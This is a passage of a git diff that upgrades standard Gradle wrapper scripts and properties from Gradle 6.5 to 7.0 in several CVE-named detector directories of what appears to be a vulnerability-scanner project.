newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20196340/gradlew.bat b/google/detectors/rce/cve20196340/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20196340/gradlew.bat +++ b/google/detectors/rce/cve20196340/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar index 7831296e4..d64cd4917 100644 Binary files a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties index 9e6fcc10e..d04736436 100644 --- a/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20199193/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -zipStorePath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20199193/gradlew b/google/detectors/rce/cve20199193/gradlew index 12d12895c..1aa94a426 100755 --- a/google/detectors/rce/cve20199193/gradlew +++ b/google/detectors/rce/cve20199193/gradlew 
@@ -1,78 +1,127 @@ -#!/usr/bin/env sh +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null - -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS="" +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. 
-MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + # Determine the Java command to use to start the JVM. if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -81,92 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) -# For Cygwin, switch paths to Windows format before running java -if $cygwin ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} 
t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=$((i+1)) + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - (0) set -- ;; - (1) set -- "$args0" ;; - (2) set -- "$args0" "$args1" ;; - (3) set -- "$args0" "$args1" "$args2" ;; - (4) set -- "$args0" "$args1" "$args2" "$args3" ;; - (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=$(save "$@") - -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS --illegal-access=permit --add-opens java.base/java.lang=ALL-UNNAMED $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" -# by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong -if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then - cd "$(dirname "$0")" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 
+DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" fi +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20199193/gradlew.bat b/google/detectors/rce/cve20199193/gradlew.bat index f9553162f..93e3f59f1 100644 --- a/google/detectors/rce/cve20199193/gradlew.bat +++ b/google/detectors/rce/cve20199193/gradlew.bat 
@@ -1,4 +1,20 @@ -@if "%DEBUG%" == "" @echo off +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -9,19 +25,23 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -set DEFAULT_JVM_OPTS= +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" @rem Find java.exe if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -35,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 
@@ -45,38 +65,26 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties 
+++ b/google/detectors/rce/cve202121972/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve202121972/gradlew b/google/detectors/rce/cve202121972/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve202121972/gradlew +++ b/google/detectors/rce/cve202121972/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS 